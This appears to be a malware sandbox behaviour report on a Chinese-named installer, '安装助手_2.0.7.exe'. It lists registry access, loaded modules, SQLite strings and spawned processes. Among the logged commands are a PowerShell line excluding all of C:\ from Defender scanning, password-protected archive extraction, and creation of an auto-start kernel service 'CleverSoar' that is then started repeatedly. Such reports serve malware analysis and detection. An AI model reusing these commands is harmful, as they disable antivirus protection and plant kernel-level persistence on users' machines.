Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000001.00000003.1780028810.0000000004339000.00000004.00001000.00020000.00000000.sdmp, is-U9N4C.tmp.6.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000001.00000003.1780028810.0000000004339000.00000004.00001000.00020000.00000000.sdmp, is-U9N4C.tmp.6.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000001.00000003.1780028810.0000000004339000.00000004.00001000.00020000.00000000.sdmp, is-U9N4C.tmp.6.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000001.00000003.1780028810.0000000004339000.00000004.00001000.00020000.00000000.sdmp, is-U9N4C.tmp.6.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000001.00000003.1780028810.0000000004339000.00000004.00001000.00020000.00000000.sdmp, is-U9N4C.tmp.6.drBinary or memory string: SELECT data FROM %Q.'%q_node' WHERE nodeno=?Node %lld missing from databaseNode %lld is too small (%d bytes)Rtree depth out of range (%d)Node %lld is too small for cell count of %d (%d bytes)Dimension %d of cell %d on node %lld is corruptDimension %d of cell %d on node %lld is corrupt relative to parentwrong number of arguments to function rtreecheck()SELECT * FROM %Q.'%q_rowid'Schema corrupt or not an rtree_rowid_parentENDSELECT count(*) FROM %Q.'%q_%s'cannot open value of type %sno such rowid: %lldforeign keyindexedcannot open virtual table: %scannot open table without rowid: %scannot open view: %sno such column: "%s"cannot open %s column for writingblockDELETE FROM %Q.'%q_data';DELETE FROM %Q.'%q_idx';DELETE FROM %Q.'%q_docsize';version%s_nodedata_shape does not contain a valid polygon
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000001.00000003.1780028810.0000000004339000.00000004.00001000.00020000.00000000.sdmp, is-U9N4C.tmp.6.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000001.00000003.1780028810.0000000004339000.00000004.00001000.00020000.00000000.sdmp, is-U9N4C.tmp.6.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000001.00000003.1780028810.0000000004339000.00000004.00001000.00020000.00000000.sdmp, is-U9N4C.tmp.6.drBinary or memory string: SELECT %s WHERE rowid = ?SELECT rowid, rank FROM %Q.%Q ORDER BY %s("%w"%s%s) %sinvalid rootpageorphan indexsqlite_stat%dDELETE FROM %Q.%s WHERE %s=%QDELETE FROM %Q.sqlite_master WHERE name=%Q AND type='trigger'corrupt schemaUPDATE %Q.sqlite_master SET rootpage=%d WHERE #%d AND rootpage=#%dstattable %s may not be droppeduse DROP TABLE to delete table %suse DROP VIEW to delete view %stblDELETE FROM %Q.sqlite_sequence WHERE name=%QDELETE FROM %Q.sqlite_master WHERE tbl_name=%Q and type!='trigger' UNIQUEindexcannot create a TEMP index on non-TEMP table "%s"table %s may not be indexedviews may not be indexedvirtual tables may not be indexedthere is already a table named %sindex %s already existssqlite_autoindex_%s_%dexpressions prohibited in PRIMARY KEY and UNIQUE constraintsconflicting ON CONFLICT clauses specifiedCREATE%s INDEX %.*sINSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);name='%q' AND type='index'table "%s" has more than one primary keyAUTOINCREMENT is only allowed on an INTEGER PRIMARY KEYTABLEVIEW
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000001.00000003.1780028810.0000000004339000.00000004.00001000.00020000.00000000.sdmp, is-U9N4C.tmp.6.drBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.exeVirustotal: Detection: 9%
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.exeString found in binary or memory: /LOADINF="filename"
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exeFile read: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe"
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exeProcess created: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp "C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp" /SL5="$20452,4740784,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe"
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe" /VERYSILENT
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exeProcess created: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp "C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp" /SL5="$2046A,4740784,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe" /VERYSILENT
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
Source: C:\Program Files (x86)\Windows NT\7zr.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
Source: C:\Program Files (x86)\Windows NT\7zr.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exeProcess created: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp "C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp" /SL5="$20452,4740784,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe" /VERYSILENTJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exeProcess created: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp "C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp" /SL5="$2046A,4740784,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe" /VERYSILENTJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9ialdJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= autoJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoarJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: rstrtmgr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: sspicli.dllJump to behavior
